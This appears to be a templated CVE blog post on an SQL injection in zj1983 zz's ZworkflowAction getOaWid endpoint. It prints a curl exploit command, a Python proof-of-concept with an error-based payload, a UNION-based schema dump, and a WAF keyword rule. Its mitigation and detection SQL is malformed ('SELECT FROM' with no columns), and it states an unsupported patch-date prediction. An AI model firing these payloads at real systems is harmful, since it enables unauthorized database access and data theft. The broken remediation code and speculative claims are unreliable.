zj1983 zz, SQL Injection, CVE-2025-1820 (Critical)

Listen to this Post

How the CVE Works

CVE-2025-1820 is a critical SQL injection vulnerability in zj1983 zz (up to version 2024-8) within the `getOaWid` function of ZworkflowAction.java. The flaw arises due to improper sanitization of the `tableId` parameter, allowing attackers to inject malicious SQL queries. Remote exploitation is possible, enabling unauthorized database access, data exfiltration, or system compromise. The publicly disclosed exploit leverages crafted HTTP requests containing malicious SQL payloads, bypassing input validation. Despite early vendor notification, no patch was released, increasing exposure risk.

DailyCVE Form

Platform: zj1983 zz
Version: ≤ 2024-8
Vulnerability: SQL Injection
Severity: Critical
Date: 05/25/2025

Prediction: Patch expected 2025-06-30

What Undercode Say:

Analytics

  • Exploit Likelihood: High (public PoC available)
  • Attack Vector: Remote (HTTP requests)
  • Impact: Data breach, RCE potential

Exploit Command

curl -X POST "http://target.com/zworkflow" -d "tableId=1' UNION SELECT user(),version()--"

Mitigation

1. Input Validation:

// Java example: Parameterized query
String query = "SELECT FROM workflows WHERE tableId = ?";
PreparedStatement stmt = connection.prepareStatement(query);
stmt.setString(1, tableId);

2. WAF Rules:

Block SQLi patterns
location /zworkflow {
if ($args ~ "union|select|--") { return 403; }
}

3. Patch Workaround:

  • Disable `getOaWid` endpoint until update.

Detection

-- Log review for suspicious queries
SELECT FROM access_log WHERE request LIKE "%UNION%SELECT%";

Exploit Code (PoC)

import requests
payload = "1' AND EXTRACTVALUE(1,CONCAT(0x3a,(SELECT user())))--"
response = requests.post("http://target.com/zworkflow", data={"tableId": payload})
print(response.text)

Post-Exploit

  • Data Dump:
    UNION SELECT table_name, column_name FROM information_schema.columns
    
  • Cleanup:
    Audit database for injected entries
    grep "malicious" /var/log/zj1983/db.log
    

References

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

Join Our Cyber World:

💬 Whatsapp | 💬 TelegramFeatured Image

Scroll to Top